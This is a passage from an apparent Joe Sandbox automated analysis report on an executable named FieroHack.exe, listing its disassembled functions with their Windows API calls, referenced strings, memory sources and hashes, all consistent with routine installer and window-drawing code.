                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                    • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                    • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                    • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                    Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                    • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                    • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                    • wsprintfA.USER32 ref: 00405DDB
                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405C94
                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                    • String ID: %s=%s$[Rename]
                                                    • API String ID: 2171350718-1727408572
                                                    • Opcode ID: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                    • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                    • Opcode Fuzzy Hash: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                    • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                    Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                    • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                    Strings
                                                    • "C:\Users\user\Desktop\FieroHack.exe", xrefs: 0040640E
                                                    • *?|<>/":, xrefs: 0040641A
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 589700163-2176824615
                                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                    • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                    • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                    Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                    • GetSysColor.USER32(00000000), ref: 0040423D
                                                    • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                    • SetBkMode.GDI32(?,?), ref: 00404255
                                                    • GetSysColor.USER32(?), ref: 00404268
                                                    • SetBkColor.GDI32(?,?), ref: 00404278
                                                    • DeleteObject.GDI32(?), ref: 00404292
                                                    • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                    • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                    • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                    Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                    • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 2531174081-0
                                                    • Opcode ID: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                    • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                    • Opcode Fuzzy Hash: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                    • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                    Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                    • GetMessagePos.USER32 ref: 00404AF1
                                                    • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                    • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                    • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                    Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402E00
                                                    • wsprintfA.USER32 ref: 00402E10
                                                    • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                    Strings
                                                    • verifying installer: %d%%, xrefs: 00402E0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: verifying installer: %d%%
                                                    • API String ID: 1451636040-82062127
                                                    • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                    • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                    • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                    • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                    Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                    • GetLastError.KERNEL32 ref: 0040573B
                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                    • GetLastError.KERNEL32 ref: 0040575A
                                                    Strings
                                                    • C:\Users\user\Desktop, xrefs: 004056E4
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                    • API String ID: 3449924974-2028306314
                                                    • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                    • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                    • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                    • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                    Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                    • GlobalFree.KERNEL32(?), ref: 0040288E
                                                    • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                    • String ID:
                                                    • API String ID: 2667972263-0
                                                    • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                    • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                    • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                    • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                    Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CloseEnum$DeleteValue
                                                    • String ID:
                                                    • API String ID: 1354259210-0
                                                    • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                    • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                    • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                    • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                    Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                    • GetClientRect.USER32(?,?), ref: 00401DCC
                                                    • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                    • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                    • DeleteObject.GDI32(00000000), ref: 00401E20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                    • String ID:
                                                    • API String ID: 1849352358-0
                                                    • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                    • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                    • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                    • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                    Function 00401E35 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(?), ref: 00401E38
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                    • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                    • String ID:
                                                    • API String ID: 3808545654-0
                                                    • Opcode ID: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
                                                    • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                    • Opcode Fuzzy Hash: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
                                                    • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                    Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                    • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                    • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                    • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                    Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                    • wsprintfA.USER32 ref: 00404A6A
                                                    • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
